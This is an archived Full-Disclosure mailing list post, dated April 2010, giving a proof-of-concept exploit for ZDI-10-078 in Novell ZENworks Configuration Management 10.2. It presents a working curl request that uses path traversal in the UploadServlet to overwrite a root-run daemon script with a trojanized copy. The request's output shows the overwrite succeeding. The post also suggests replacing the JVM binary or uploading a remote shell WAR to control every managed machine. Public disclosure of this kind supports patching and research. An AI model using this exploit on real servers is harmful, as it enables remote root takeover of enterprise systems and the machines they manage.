[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] PoC for ZDI-10-078

To: tucanalamigo@xxxxxxxxx
Subject: [Full-disclosure] PoC for ZDI-10-078
From: tu canal amigo <tucanalamigo@xxxxxxxxx>
Date: Mon, 26 Apr 2010 18:40:43 -0700 (PDT)

# Exploit Title: ZDI-10-078: NovellZENworks Configuration Management 
UploadServlet Remote Code Execution Vulnerability
# Date: 2009-04-26
# Author: tucanalamigo http://tucanalamigo.blogspot.com
# Software Link: 
http://www.novell.com/products/zenworks/configurationmanagement/
# Version: 10.2
# Tested on: GNU/Linux (SLES11)

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
PoC for vulnerability discovered by Stephen Fewer (www.harmonysecurity.com)
http://www.zerodayinitiative.com/advisories/ZDI-10-078/
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


You can overwrite any file owned by zenworks user (nearly all /opt/novell)
such as /opt/novell/zenworks/bin/daemon-monitor that is a shell script
executed by NovellZENworks Daemon Monitor (/etc/init.d/novell-zenmntr) and
"of course" running as root...

$ ls -l /opt/novell/zenworks/bin/daemon-monitor
-rw-rw-r-- 1 zenworkszenworks 554 XXXX-YY-ZZ 69:69 
/opt/novell/zenworks/bin/daemon-monitor
$ cat /opt/novell/zenworks/bin/daemon-monitor
SERVICES=`awk -F= '{ if ($1 == # "services") print $2}' 
/etc/opt/novell/zenworks/monitor.conf`
SLEEPTIME=`awk -F= '{ if ($1 == "sleep") print $2}' 
/etc/opt/novell/zenworks/monitor.conf`

echo $SERVICES
echo $SLEEPTIME

if [ -z "$SERVICES" ]; then
    echo "No services defined in /etc/opt/novell/zenworks/monitor.conf"
    exit 1
fi

if [ -z "$SLEEPTIME" ]; then
    SLEEPTIME=10
fi

while [ 1 ]; do
    sleep $SLEEPTIME
    for SRV in $SERVICES; do
         /etc/init.d/$SRV status >/dev/null 2>&1 || /etc/init.d/$SRV start
        ( date ; id ) >> /tmp/monitor.log 2>&1
    done
done
$


You can change /opt/novell/zenworks/bin/jsvc (Java Virtual Machine), upload
a new remoteshell.war on /opt/novell/zenworks/share/tomcat/webapps or use
imagination to take control of all machines configured in ZCM.


PoC: Upload your own daemon-monitor (./daemon-monitor.troyanizado):

$ curl -ivkl 
'http://zcm.server/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true'
 --data-binary @./daemon-monitor.troyanizado -H "Content-Type: 
application/octet-stream"
* About to connect() to zcm.server port 80 (#0)
*   Trying 127.11.22.33... connected
* Connected to zcm.server (127.11.22.33) port 80 (#0)
> POST 
> /zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true
>  HTTP/1.1
> User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.12.6.2 
> zlib/1.2.3 libidn/1.9 libssh2/1.2.2
> Host: zcm.server
> Accept: */*
> Content-Type: application/octet-stream
> Content-Length: 554
>
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
Server: Apache-Coyote/1.1
< Content-Length: 0
Content-Length: 0
< Date: Mon, 26 Apr 2010 21:58:05 GMT
Date: Mon, 26 Apr 2010 21:58:05 GMT

<
* Connection #0 to host zcm.server left intact
* Closing connection #0
$


-- 
Saludosde #linux, tu canal amigo.



      

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
Next by Date: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
Previous by thread: [Full-disclosure] [SECURITY] [DSA 2021-2] New spamass-milter packages fix regression
Next by thread: [Full-disclosure] XSS in Drupal Better Formats Module
Index(es):
- Date
- Thread